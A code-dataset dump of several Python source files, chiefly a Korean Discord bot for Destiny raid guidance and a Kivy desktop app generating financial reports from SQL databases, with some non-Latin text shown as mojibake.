hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k โ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 โ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 โ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k โ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 โ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 โ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k โ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 โ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 โ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace8b15cfe2e9b8a248347f5ce43fd0ec4795efc | 11,532 | py | Python | main.py | ruby3141/Destiny-Bot | 16353544d53a53e106a1ecb35478a713cf2aebd4 | [
"MIT"
] | null | null | null | main.py | ruby3141/Destiny-Bot | 16353544d53a53e106a1ecb35478a713cf2aebd4 | [
"MIT"
] | null | null | null | main.py | ruby3141/Destiny-Bot | 16353544d53a53e106a1ecb35478a713cf2aebd4 | [
"MIT"
] | null | null | null |
import asyncio
from configparser import ConfigParser
import copy
import json
import os
import random
import re
from collections import defaultdict
import discord
import atexit
from utility.issue import show_issue
from utility.init import *
from raid.dsc import *
from raid.gos import *
from raid.lw import *
from raid.no_named import *
from utility.utility import *
from utility.issue import *
client = discord.Client()
user = discord.User
config = ConfigParser()
config.read('./env/config.ini')
token = config['Default']['token']
ignore_user_set = set()
@client.event
async def on_ready():
print('We have logged in as {0.user}'.format(client))
# ๋ด ๊ถํ์ด ์๋ ๊ณณ์๋ง ์ฐ๋๋ก ํ๋ฝํ์.
for guild in client.guilds:
for channel in guild.text_channels:
if channel.name == "๊ฐ๋ฐ-ํ
์คํธ":
await channel.send("์ผ์... ์ฌ๊ธฐ๊ฐ ์ด๋์ฃ ?")
@client.event
async def on_message(message):
#config ํ์ผ๋ก ๊ด๋ฆฌํ๋ ๋ฐฉ๋ฒ ์์๊น ๋ฆฌ์คํธ๋ ๋๋ฌด ์ง์ ๋ถํ๋ฐ...
call_string = '์ฌ๊ธฐ๋ผ'
activity_list = init_activity()
raid_list = init_raid()
raid_summary_list = ['๋ง์','๊ตฌ์ ','๋ฅ์คํค']
error_message = f'{message.author.name} ์ํธ์๋, ์ ๊ฐ ์์๋ค์ ์ ์๋ ๋ง๋ก ๋ถํ๋๋ฆด๊ฒ์. **์ฌ๊ธฐ๋ผ ์ฌ์ฉ๋ฒ**์ ์ฐ๋ฉด ์ ๊ฐ ์ด๋ค ๋ง์ ์์๋ฃ๋์ง ์ ์ ์์ ๊ฑฐ์์.'
if message.author.bot:
return
if message.content.startswith(call_string):
option = message.content.split(" ")
option = option[1:]
if len(option) == 0:
num = 0
else:
num = init_num(option[-1])
if num == -1 or num > 10:
await message.channel.send(f"๋ฐ๋ณต์ ๋ฉ์ธ์ง๊ฐ ๋๋ฌด ๋ง์์ง๋ ๊ฒ์ ๋ฐฉ์งํ๊ธฐ ์ํด์ 10๋ฒ ์ดํ๋ก๋ง ๋๋ฆฌ๋๋ก ํ๊ณ ์์ด์.")
await message.channel.send(f"ํ์ง๋ง ๋ฐ๋ณต ํ์๋ฅผ ๋๋ฌด ๋ง์ด ์ค์ ํ ๊ฑฐ ๊ฐ์์. ๊ทธ๋์ ํ ๋ฒ๋ง ํ๋ค๊ณ ์๊ฐํ๊ณ ๋งํด๋๋ฆด๊ฒ์.")
num = 1
#์ด์คํฐ ์๊ทธ
if message.author.id in ignore_user_set:
if len(option) > 0 and option[0] in ['๋ฏธ์', '๋ฏธ์ํด', '์๊ทธ๋ด๊ฒ']:
ignore_user_set.remove(message.author.id)
await message.channel.send("์ด๋ฒ ํ ๋ฒ๋ง ๋ด๋๋ฆด๊ฒ์. ๋ ๊ทธ๋ฌ๊ธฐ๋ง ํด ๋ด์.")
else:
await message.channel.send("์ ์ฃฝ์ด๋ ค ํ ๊ฒ์ ๋ํด ์ฌ๊ณผํ๊ธฐ ์ ๊น์ง๋ ์๋ฌด๊ฒ๋ ์คํํ์ง ์์๋์.")
elif len(option) == 0:
await message.channel.send(f"์ ๊ทธ๋ฌ์์ฃ ? {message.author.name} ์ํธ์๋?")
elif option[0] == '์ํญํด':
ignore_user_set.add(message.author.id)
await message.channel.send(f"{message.author.name} ์ํธ์๋? ์ด๋ป๊ฒ... ์ ๋ฅผ ์ฃฝ์ด๋ ค ํ์ค ์๊ฐ ์์ฃ ?")
elif '์๋ฐ๋ผ' in option:
await message.channel.send("์ฌ๊ธฐ์ ๊ทธ ํ๋ ๋นก๋นก์ด๋ฅผ ์ ์ฐพ์ผ์๋ ๊ฑฐ์ฃ ?")
await message.channel.send("์๋ฐ๋ผ๋ฅผ ์ฐพ์ ์ด์, ์๋ฌด๊ฒ๋ ์คํํ์ง ์์๋์.")
elif option[0] == '๊ฐ์๋ฐ์๋ณด' or option[0] == "๊ฐ๋ง๋ณด":
choose_one = random.choice(['๊ฐ์','๋ฐ์','๋ณด'])
await message.channel.send(choose_one)
elif option[0] == '๋๋ค':
#๋๋ค
if len(option) == 1 or (len(option) == 2 and num > 0 and '๋ฒ' in option[1]):
activity_num_dict = defaultdict(lambda:0)
for _ in range(num):
choosen_activity = choosen(activity_list)
activity_num_dict[choosen_activity] += 1
text_dict = change_activity_text_dict(activity_num_dict)
for x in text_dict:
await message.channel.send(x)
#๋๋ค ๋ ์ด๋
elif option[1] == '๋ ์ด๋':
raid_num_dict = defaultdict(lambda:0)
for _ in range(num):
choosen_raid = choosen(raid_list)
raid_num_dict[choosen_raid] += 1
text_dict = change_raid_text_dict(raid_num_dict)
for x in text_dict:
await message.channel.send(x)
else:
await message.channel.send(error_message)
elif option[0] in raid_summary_list:
if option[0] == '๋ง์':
if len(option) == 1:
lw_string = print_lw_named()
elif option[1] == '1๋ด' or option[1] == '1๋ค์๋':
lw_string = print_no_named()
elif option[1] == '2๋ด' or option[1] == '2๋ค์๋':
lw_string = print_lw_sec_named()
elif option[1] == '3๋ด' or option[1] == '3๋ค์๋':
lw_string = print_lw_third_named()
elif option[1] == '4๋ด' or option[1] == '4๋ค์๋':
lw_string = print_lw_forth_named()
elif option[1] == '5๋ด' or option[1] == '5๋ค์๋':
lw_string = print_no_named()
elif option[1] == '6๋ด' or option[1] == '6๋ค์๋':
lw_string = print_no_named()
else:
lw_string = "์ํธ์๋, ๋ง์ง๋ง ์์์ 6๋ณด์ค๋ก ๋์ด ์๋ ๊ฑฐ ์์์ฃ ? ์๋๋ฉด ๋ช
๋ น์ด๋ฅผ ์๋ชป ์
๋ ฅํ ๊ฑฐ ๊ฐ์๋ฐ... ํ์ธํด์ฃผ์ธ์."
await message.channel.send(lw_string)
elif option[0] == '๊ตฌ์ ':
if len(option) == 1:
gos_string = print_gos_named()
elif option[1] == '1๋ด' or option[1] == '1๋ค์๋':
gos_string = print_gos_first_named()
elif option[1] == '2๋ด' or option[1] == '2๋ค์๋':
gos_string = print_gos_sec_named()
elif option[1] == '3๋ด' or option[1] == '3๋ค์๋':
gos_string = print_gos_third_named()
elif option[1] == '4๋ด' or option[1] == '4๋ค์๋':
gos_string = print_gos_forth_named()
else:
gos_string = "์ํธ์๋, ๊ตฌ์์ ์ ์์ ๋ณด์ค๊ฐ ์ด 4๋ช
์๋ ๊ฑฐ ์์์ฃ ? ์๋๋ฉด ๋ช
๋ น์ด๋ฅผ ์๋ชป ์
๋ ฅํ ๊ฑฐ ๊ฐ์๋ฐ... ํ์ธํด์ฃผ์ธ์."
await message.channel.send(gos_string)
else:
if len(option) == 1:
dsc_string = print_dsc_named()
elif option[1] == '1๋ด' or option[1] == '1๋ค์๋':
dsc_string = print_dsc_first_named()
elif option[1] == '2๋ด' or option[1] == '2๋ค์๋':
dsc_string = print_dsc_sec_named()
elif option[1] == '3๋ด' or option[1] == '3๋ค์๋':
dsc_string = print_no_named()
elif option[1] == '4๋ด' or option[1] == '4๋ค์๋':
dsc_string = print_dsc_forth_named()
else:
dsc_string = "์ํธ์๋, ๋ฅ์คํค ๋ฌด๋ค์ 4๋ช
์ ๋ณด์ค๊ฐ ๋๊ธฐํ๊ณ ์๋ ๊ฑฐ ์์์ฃ ? ์๋๋ฉด ๋ช
๋ น์ด๋ฅผ ์๋ชป ์
๋ ฅํ ๊ฑฐ ๊ฐ์๋ฐ... ํ์ธํด์ฃผ์ธ์."
await message.channel.send(dsc_string)
elif option[0] == '์ฌ์ฉ๋ฒ' or option[0] == 'help' or option[0] == '๋์':
use_string = usage()
await message.channel.send(use_string)
elif option[0] == '์๋ผ๊ณ ๋' or option[0] == '์๋ผ๊ณ ๋ฅ':
choose_one = random.choice(['๊ทธ๋ผ์. ๋ฌผ๋ก ์ด์ฃ .','์๋์.','์... ์ ๋ชจ๋ฅด๊ฒ ๋ค์. ์ค์๋ฆฌ์ค์๊ฒ ํ ๋ฒ ๋ฌผ์ด๋ณด์ฃ ...'])
await message.channel.send(choose_one)
elif option[0] == '์๋
':
await message.channel.send(f"{message.author.name} ์ํธ์๋, ์๋
ํ์ธ์?")
# elif option[0] == '์ค๋': #์ค๋
# if len(option) < 1:
# await message.channel.send("๋ด์ ์ฌ์ฉํ ์ ์์ต๋๋ค, ๋ช
๋ น์ด๊ฐ ์๋๊ฒ ์๋์ง?")
# elif len(option) == 1:
# await message.channel.send("์ค๋ ๋์์ผ ํ๋ ๊ฒ์ ๋ํด์ ๋ง์๋๋ฆด๊ฒ์.")
# today_count = additive_option(count_activity)
# today_all_dict = multiple_activity(random_activity,today_count)
# for printer_ in print_random_dict(today_all_dict):
# await message.channel.send(printer_)
# elif option[1] == 'ํ๋':
# mode = random.randint(0,1)
# if mode == 0:
# option_set = ['easy','hard']
# else:
# option_set = ['hard','easy']
# today_count = additive_option(count_activity, option = option_set[0])
# today_all_dict = multiple_activity(random_activity,today_count,option = option_set[1])
# for printer_ in print_random_dict(today_all_dict):
# await message.channel.send(printer_)
# elif option[1] == '๋ผ์ดํธ':
# today_count = additive_option(count_activity, option = 'easy')
# today_all_dict = multiple_activity(random_activity,today_count)
# for printer_ in print_random_dict(today_all_dict):
# await message.channel.send(printer_)
# elif option[1] == "๊ณต๊ฒฉ์ ":
# if len(option) == 3:
# strike_num = additive_option(count_strike,option[2])
# else:
# strike_num = count_strike()
# string = string_format('๊ณต๊ฒฉ์ ',strike_num)
# await message.channel.send(string)
# elif option[1] == "๋ ์ด๋":
# if len(option) == 3:
# raid_num = additive_option(count_activity,option[2])
# else :
# raid_num = count_activity()
# string = string_format('๋ ์ด๋',raid_num)
# await message.channel.send(string)
# if len(option) > 3 or (len(option) == 3 and (option[2] != '๋ผ์ดํธ' and option[2] != 'ํ๋')):
# raid_dict = multiple_activity(random_raid,raid_num)
# for key, value in raid_dict.items():
# string = print_raid(key)
# string = string + f" {str(value)}๋ฒ ์ ๋๋ฉด ์ถฉ๋ถํ ๊ฑฐ ๊ฐ์์."
# await message.channel.send(string)
# elif option[1] == "์์ฅ" or option[1].startswith("์๋ จ"):
# if len(option) >2 :
# crucible_num = additive_option(count_activity,option[2])
# else :
# crucible_num = count_activity()
# string = string_format('์๋ จ์ ์ฅ',crucible_num)
# await message.channel.send(string)
# else:
# await message.channel.send("์ด... ์ํธ์๋... ๋ญ๋ผ๊ณ ์...?")
# #ํ๋
# elif option[0] == command_list[4]:
# string = random_activity()
# string = print_activity(string)
# await message.channel.send(string)
# #๋ ์ด๋
# elif option[0] == command_list[3]:
# string = random_raid()
# string = print_raid(string)
# await message.channel.send(string)
elif option[0] == '์
๋ฐ์ดํธ':
await message.channel.send(show_issue())
else:
await message.channel.send(error_message)
def additive_option(func_name,option = 'normal'):
if option == "easy" or option == "๋ผ์ดํธ":
result_num = func_name(option = 'easy')
elif option == "hard" or option == "ํ๋":
result_num = func_name(option = 'hard')
else :
result_num = func_name(option = 'normal')
return result_num
def count_strike(option='normal'):
if option == 'easy':
strike_num = random.randint(1,3)
else : #normal, hard
strike_num = random.randint(3,30)
return strike_num
def count_activity(option='normal'):
if option == 'easy':
raid_num = random.randint(1,2)
elif option == 'hard':
raid_num = random.randint(5,10)
else: # option == 'normal':
raid_num = random.randint(3,6)
return raid_num
def string_format(option='๊ณต๊ฒฉ์ ',num=0):
string = f"์ค๋ {option} ๋ช ํ ๊ฐ์ผ ํ๋์? {str(num)}ํ"
return string
#must be iterator
def multiple_activity(func,num,option = 'normal'):
activity_dict = dict()
for _ in range(num):
find_activity = func(option)
if find_activity not in activity_dict:
activity_dict[find_activity] = 1
else:
activity_dict[find_activity] += 1
return activity_dict
client.run(token)
| 39.765517 | 117 | 0.538935 |
ace8b18cff3facba9d2d521e1b87397cb3a2533b | 640 | py | Python | src/robotide/namespace/__init__.py | hoteltianya/RIDE | dcdccfec631517743d24c8e31fc6687fd29338a0 | [
"ECL-2.0",
"Apache-2.0"
] | 11 | 2017-09-30T05:47:28.000Z | 2019-04-15T11:58:40.000Z | src/robotide/namespace/__init__.py | hoteltianya/RIDE | dcdccfec631517743d24c8e31fc6687fd29338a0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robotide/namespace/__init__.py | hoteltianya/RIDE | dcdccfec631517743d24c8e31fc6687fd29338a0 | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2018-02-13T10:22:39.000Z | 2019-07-04T07:39:28.000Z | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from namespace import Namespace
| 40 | 75 | 0.759375 |
ace8b1b3a51a2ad868b3cc67bb3bf3632620e54c | 1,046 | py | Python | prod/jobs/refill_future_renko.py | howyu88/vnpy2 | c8ae445823dc1f71abda1a79fae7d4be3dd92dd4 | [
"MIT"
] | 323 | 2015-11-21T14:45:29.000Z | 2022-03-16T08:54:37.000Z | prod/jobs/refill_future_renko.py | howyu88/vnpy2 | c8ae445823dc1f71abda1a79fae7d4be3dd92dd4 | [
"MIT"
] | 9 | 2017-03-21T08:26:21.000Z | 2021-08-23T06:41:17.000Z | prod/jobs/refill_future_renko.py | howyu88/vnpy2 | c8ae445823dc1f71abda1a79fae7d4be3dd92dd4 | [
"MIT"
] | 148 | 2016-09-26T03:25:39.000Z | 2022-02-06T14:43:48.000Z | # flake8: noqa
# ่ชๅจ่กฅๅ
จๆ่ดงๆๆฐๅ็บฆrenko bar => Mongodb
# ไธ่ฝฝ็tickๆฐๆฎ็ผๅญ => tick_data/tdx/future
import sys, os, copy, csv, signal
vnpy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
if vnpy_root not in sys.path:
print(f'append {vnpy_root} into sys.path')
sys.path.append(vnpy_root)
os.environ["VNPY_TESTING"] = "1"
from vnpy.data.renko.rebuild_future import *
if __name__ == "__main__":
if len(sys.argv) < 4:
print(u'่ฏท่พๅ
ฅไธไธชๅๆฐ host symbol pricetick')
exit()
print(sys.argv)
host = sys.argv[1]
setting = {
"host": host,
"db_name": FUTURE_RENKO_DB_NAME,
"cache_folder": os.path.join(vnpy_root, 'tick_data', 'tdx', 'future')
}
builder = FutureRenkoRebuilder(setting)
symbol = sys.argv[2]
price_tick = float(sys.argv[3])
print(f'ๅฏๅจๆ่ดงrenko่กฅๅ
จ,ๆฐๆฎๅบ:{host}/{FUTURE_RENKO_DB_NAME} ๅ็บฆ:{symbol}')
builder.start(symbol=symbol, price_tick=price_tick, height=[3, 5, 10, 'K3', 'K5', 'K10'], refill=True)
print(f'exit refill {symbol} renkos')
| 26.820513 | 106 | 0.651052 |
ace8b1d208142656a18b6cba992440ac1d08c2eb | 311,061 | py | Python | barsicreport2.py | sendhello/Barsic.Report | 3dc4bd1957df52b90b18f1cabf0ebba4ea6baec9 | [
"MIT"
] | 1 | 2018-08-14T16:40:49.000Z | 2018-08-14T16:40:49.000Z | barsicreport2.py | sendhello/Barsic.Report | 3dc4bd1957df52b90b18f1cabf0ebba4ea6baec9 | [
"MIT"
] | 4 | 2021-03-31T20:08:57.000Z | 2022-02-26T12:33:28.000Z | barsicreport2.py | sendhello/Barsic.Report | 3dc4bd1957df52b90b18f1cabf0ebba4ea6baec9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import sys
from ast import literal_eval
import logging
from datetime import datetime, timedelta
import pyodbc
from typing import Dict, List, Any
from decimal import Decimal
from lxml import etree, objectify
import csv
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font, Side
from dateutil.relativedelta import relativedelta
from typing import Tuple
from kivy.app import App
from kivy.uix.modalview import ModalView
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.config import ConfigParser
from kivy.clock import Clock
from kivy.utils import get_color_from_hex, get_hex_from_color
from kivy.metrics import dp
from kivy.properties import ObjectProperty, StringProperty
from kivymd.dialog import MDDialog
from kivymd.bottomsheet import MDListBottomSheet, MDGridBottomSheet
from kivymd.textfields import MDTextField
from main import __version__
from libs.translation import Translation
from libs.uix.baseclass.startscreen import StartScreen
from libs.uix.lists import Lists
from libs.utils.showplugins import ShowPlugins
from libs import functions, to_google_sheets
from kivymd.theming import ThemeManager
from kivymd.label import MDLabel
from kivymd.time_picker import MDTimePicker
from kivymd.date_picker import MDDatePicker
from toast import toast
from dialogs import card
import yadisk
import urllib
import re
import requests
import webbrowser
import httplib2
import apiclient.discovery
from oauth2client.service_account import ServiceAccountCredentials
import telepot
import socks, socket
import time
logging.basicConfig(filename="barsic_reports.log", level=logging.INFO)
class BarsicReport2(App):
"""
ะคัะฝะบัะธะพะฝะฐะป ะฟัะพะณัะฐะผะผั.
"""
title = 'ะะฐััะธะบ.ะััะตัั'
icon = 'icon.png'
nav_drawer = ObjectProperty()
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Purple'
theme_cls.theme_style = 'Light'
lang = StringProperty('ru')
previous_date_from = ObjectProperty()
previous_date_to = ObjectProperty()
def __init__(self, **kvargs):
super(BarsicReport2, self).__init__(**kvargs)
Window.bind(on_keyboard=self.events_program)
Window.soft_input_mode = 'below_target'
self.list_previous_screens = ['base']
self.window = Window
self.plugin = ShowPlugins(self)
self.config = ConfigParser()
self.manager = None
self.window_language = None
self.exit_interval = False
self.dict_language = literal_eval(
open(
os.path.join(self.directory, 'data', 'locales', 'locales.txt')).read()
)
self.translation = Translation(
self.lang, 'Ttest', os.path.join(self.directory, 'data', 'locales')
)
self.date_from = datetime.strptime(datetime.now().strftime('%Y-%m-%d'), '%Y-%m-%d')
self.date_to = self.date_from + timedelta(1)
self.org1 = None
self.org2 = None
self.org3 = None
self.count_sql_error = 0
self.org_for_finreport = {}
self.new_service = []
self.orgs = []
self.new_agentservice = []
self.agentorgs = []
def get_application_conorgfig(self):
return super(BarsicReport2, self).get_application_config(
'{}/%(appname)s.ini'.format(self.directory))
def build_config(self, config):
"""ะกะพะทะดะฐัั ัะฐะนะป ะฝะฐัััะพะตะบ ะฟัะธะปะพะถะตะฝะธั barsicreport2.ini."""
config.adddefaultsection('General')
config.setdefault('General', 'language', 'ru')
config.setdefault('General', 'finreport_xls', 'False')
config.setdefault('General', 'finreport_google', 'False')
config.setdefault('General', 'finreport_telegram', 'False')
config.setdefault('General', 'agentreport_xls', 'False')
config.setdefault('General', 'split_by_days', 'False')
config.setdefault('General', 'date_switch', 'True')
config.setdefault('General', 'use_yadisk', 'False')
config.setdefault('General', 'check_client_count_total_xls', 'False')
config.setdefault('General', 'check_cashreport_xls', 'False')
config.setdefault('General', 'check_itogreport_xls', 'False')
config.adddefaultsection('MSSQL')
config.setdefault('MSSQL', 'driver', '{SQL Server}')
config.setdefault('MSSQL', 'server', '127.0.0.1\\SQLEXPRESS')
config.setdefault('MSSQL', 'user', 'sa')
config.setdefault('MSSQL', 'pwd', 'password')
config.setdefault('MSSQL', 'database1', 'database')
config.setdefault('MSSQL', 'database2', 'database')
config.setdefault('MSSQL', 'database_bitrix', 'database')
config.setdefault('MSSQL', 'server_rk', '127.0.0.1\\SQLEXPRESS')
config.setdefault('MSSQL', 'user_rk', 'sa')
config.setdefault('MSSQL', 'pwd_rk', 'password')
config.setdefault('MSSQL', 'database_rk', 'database')
config.adddefaultsection('PATH')
config.setdefault('PATH', 'reportXML', 'data/org_for_report.xml')
config.setdefault('PATH', 'agentXML', 'data/org_plat_agent.xml')
config.setdefault('PATH', 'itogreportXML', 'data/group_for_itogreport.xml')
config.setdefault('PATH', 'local_folder', 'report')
config.setdefault('PATH', 'path', 'report')
config.setdefault('PATH', 'CREDENTIALS_FILE', 'data/1720aecc5640.json')
config.setdefault('PATH', 'list_google_docs', 'data/list_google_docs.csv')
config.adddefaultsection('Bitrix')
config.setdefault('Bitrix', 'bitrix_exchange_url', 'example.site')
config.setdefault('Bitrix', 'bitrix_exchange_path', '/bitrix/admin/1c_exchange.php')
config.setdefault('Bitrix', 'bitrix_login', 'login')
config.setdefault('Bitrix', 'bitrix_password', 'password')
config.adddefaultsection('Yadisk')
config.setdefault('Yadisk', 'yadisk_token', 'token')
config.adddefaultsection('Telegram')
config.setdefault('Telegram', 'telegram_token', '111111111:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
config.setdefault('Telegram', 'telegram_chanel_id', '111111111111')
config.setdefault('Telegram', 'telegram_proxy_use', 'False')
config.setdefault('Telegram', 'telegram_proxy_type', '#PROXY_TYPE_SOCKS4 or PROXY_TYPE_SOCKS5 or PROXY_TYPE_HTTP')
config.setdefault('Telegram', 'telegram_proxy_ip', '127.0.0.1')
config.setdefault('Telegram', 'telegram_proxy_port', '1080')
config.setdefault('Telegram', 'telegram_proxy_auth', 'False')
config.setdefault('Telegram', 'telegram_proxy_username', 'username')
config.setdefault('Telegram', 'telegram_proxy_password', 'password')
config.adddefaultsection('GoogleShets')
config.setdefault('GoogleShets', 'google_all_read', 'False')
config.setdefault('GoogleShets', 'google_reader_list', '')
config.setdefault('GoogleShets', 'google_writer_list', '')
def set_value_from_config(self):
'''ะฃััะฐะฝะฐะฒะปะธะฒะฐะตั ะทะฝะฐัะตะฝะธั ะฟะตัะตะผะตะฝะฝัั
ะธะท ัะฐะนะปะฐ ะฝะฐัััะพะตะบ barsicreport2.ini.'''
self.config.read(os.path.join(self.directory, 'barsicreport2.ini'))
self.lang = self.config.get('General', 'language')
self.finreport_xls = functions.to_bool(self.config.get('General', 'finreport_xls'))
self.finreport_google = functions.to_bool(self.config.get('General', 'finreport_google'))
self.finreport_telegram = functions.to_bool(self.config.get('General', 'finreport_telegram'))
self.agentreport_xls = functions.to_bool(self.config.get('General', 'agentreport_xls'))
# self.split_by_days = functions.to_bool(self.config.get('General', 'split_by_days'))
self.split_by_days = False
self.date_switch = functions.to_bool(self.config.get('General', 'date_switch'))
self.use_yadisk = functions.to_bool(self.config.get('General', 'use_yadisk'))
self.check_client_count_total_xls = functions.to_bool(self.config.get('General', 'check_client_count_total_xls'))
self.check_cashreport_xls = functions.to_bool(self.config.get('General', 'check_cashreport_xls'))
self.check_itogreport_xls = functions.to_bool(self.config.get('General', 'check_itogreport_xls'))
self.driver = self.config.get('MSSQL', 'driver')
self.server = self.config.get('MSSQL', 'server')
self.user = self.config.get('MSSQL', 'user')
self.pwd = self.config.get('MSSQL', 'pwd')
self.database1 = self.config.get('MSSQL', 'database1')
self.database2 = self.config.get('MSSQL', 'database2')
self.database_bitrix = self.config.get('MSSQL', 'database_bitrix')
self.server_rk = self.config.get('MSSQL', 'server_rk')
self.user_rk = self.config.get('MSSQL', 'user_rk')
self.pwd_rk = self.config.get('MSSQL', 'pwd_rk')
self.database_rk = self.config.get('MSSQL', 'database_rk')
self.reportXML = self.config.get('PATH', 'reportXML')
self.agentXML = self.config.get('PATH', 'agentXML')
self.itogreportXML = self.config.get('PATH', 'itogreportXML')
self.local_folder = self.config.get('PATH', 'local_folder')
self.path = self.config.get('PATH', 'path')
self.CREDENTIALS_FILE = self.config.get('PATH', 'CREDENTIALS_FILE')
self.list_google_docs = self.config.get('PATH', 'list_google_docs')
self.yadisk_token = self.config.get('Yadisk', 'yadisk_token')
self.bitrix_exchange_url = self.config.get('Bitrix', 'bitrix_exchange_url')
self.bitrix_exchange_path = self.config.get('Bitrix', 'bitrix_exchange_path')
self.bitrix_login = self.config.get('Bitrix', 'bitrix_login')
self.bitrix_password = self.config.get('Bitrix', 'bitrix_password')
self.telegram_token = self.config.get('Telegram', 'telegram_token')
self.telegram_chanel_id = self.config.get('Telegram', 'telegram_chanel_id') # '215624388'
self.telegram_proxy_use = functions.to_bool(self.config.get('Telegram', 'telegram_proxy_use'))
self.telegram_proxy_type = self.config.get('Telegram', 'telegram_proxy_type')
self.telegram_proxy_ip = self.config.get('Telegram', 'telegram_proxy_ip')
self.telegram_proxy_port = self.config.get('Telegram', 'telegram_proxy_port')
self.telegram_proxy_auth = functions.to_bool(self.config.get('Telegram', 'telegram_proxy_auth'))
self.telegram_proxy_username = self.config.get('Telegram', 'telegram_proxy_username')
self.telegram_proxy_password = self.config.get('Telegram', 'telegram_proxy_password')
self.google_all_read = functions.to_bool(self.config.get('GoogleShets', 'google_all_read'))
self.google_reader_list = self.config.get('GoogleShets', 'google_reader_list')
self.google_writer_list = self.config.get('GoogleShets', 'google_writer_list')
def build(self):
self.set_value_from_config()
self.load_all_kv_files(os.path.join(self.directory, 'libs', 'uix', 'kv'))
self.screen = StartScreen() # ะณะปะฐะฒะฝัะน ัะบัะฐะฝ ะฟัะพะณัะฐะผะผั
self.manager = self.screen.ids.manager
self.nav_drawer = self.screen.ids.nav_drawer
return self.screen
def load_all_kv_files(self, directory_kv_files):
for kv_file in os.listdir(directory_kv_files):
kv_file = os.path.join(directory_kv_files, kv_file)
if os.path.isfile(kv_file):
with open(kv_file, encoding='utf-8') as kv:
Builder.load_string(kv.read())
def events_program(self, instance, keyboard, keycode, text, modifiers):
'''ะัะทัะฒะฐะตััั ะฟัะธ ะฝะฐะถะฐัะธะธ ะบะฝะพะฟะบะธ ะะตะฝั ะธะปะธ Back Key
ะฝะฐ ะผะพะฑะธะปัะฝะพะผ ััััะพะนััะฒะต.'''
if keyboard in (1001, 27):
if self.nav_drawer.state == 'open':
self.nav_drawer.toggle_nav_drawer()
self.back_screen(event=keyboard)
elif keyboard in (282, 319):
pass
return True
def back_screen(self, event=None):
'''ะะตะฝะตะดะถะตั ัะบัะฐะฝะพะฒ. ะัะทัะฒะฐะตััั ะฟัะธ ะฝะฐะถะฐัะธะธ Back Key
ะธ ัะตะฒัะพะฝะฐ "ะะฐะทะฐะด" ะฒ ToolBar.'''
# ะะฐะถะฐัะฐ BackKey.
if event in (1001, 27):
if self.manager.current == 'base':
self.dialog_exit()
return
try:
self.manager.current = self.list_previous_screens.pop()
except:
self.manager.current = 'base'
self.screen.ids.action_bar.title = self.title
self.screen.ids.action_bar.left_action_items = \
[['menu', lambda x: self.nav_drawer._toggle()]]
def show_plugins(self, *args):
'''ะัะฒะพะดะธั ะฝะฐ ัะบัะฐะฝ ัะฟะธัะพะบ ะฟะปะฐะณะธะฝะพะฒ.'''
self.plugin.show_plugins()
def show_about(self, *args):
self.nav_drawer.toggle_nav_drawer()
self.screen.ids.about.ids.label.text = \
self.translation._(
u'[size=20][b]ะะฐััะธะบ.ะััะตัั[/b][/size]\n\n'
u'[b]Version:[/b] {version}\n'
u'[b]License:[/b] Corporate\n\n'
u'[size=20][b]Developer[/b][/size]\n\n'
u'[ref=github.com/sendhello]'
u'[color={link_color}]SendHello[/color][/ref]\n\n'
u'[b]Source code:[/b] '
u'[ref=github.com/sendhello/Barsic.Report]'
u'[color={link_color}]GitHub[/color][/ref]').format(
version=__version__,
link_color=get_hex_from_color(self.theme_cls.primary_color)
)
self.manager.current = 'about'
self.screen.ids.action_bar.left_action_items = \
[['chevron-left', lambda x: self.back_screen(27)]]
def show_reports(self, *args):
"""
ะะตัะตั
ะพะด ะฝะฐ ัะบัะฐะฝ ะะขะงะะขะซ
:param args:
:return:
"""
self.nav_drawer.toggle_nav_drawer()
self.manager.current = 'report'
self.screen.ids.action_bar.left_action_items = \
[['chevron-left', lambda x: self.back_screen(27)]]
# ะะฐะณััะทะบะฐ ะฟะฐัะฐะผะตััะพะฒ ะธะท INI-ัะฐะนะปะฐ
self.load_checkbox()
self.set_date_from(datetime.now().date())
def show_license(self, *args):
"""
ะะตัะตั
ะพะด ะฝะฐ ัะบัะฐะฝ ะะะฆะะะะะฏ
:param args:
:return:
"""
self.screen.ids.license.ids.text_license.text = \
self.translation._('%s') % open(
os.path.join(self.directory, 'LICENSE'), encoding='utf-8').read()
self.nav_drawer._toggle()
self.manager.current = 'license'
self.screen.ids.action_bar.left_action_items = \
[['chevron-left', lambda x: self.back_screen(27)]]
self.screen.ids.action_bar.title = \
self.translation._('MIT LICENSE')
def select_locale(self, *args):
"""
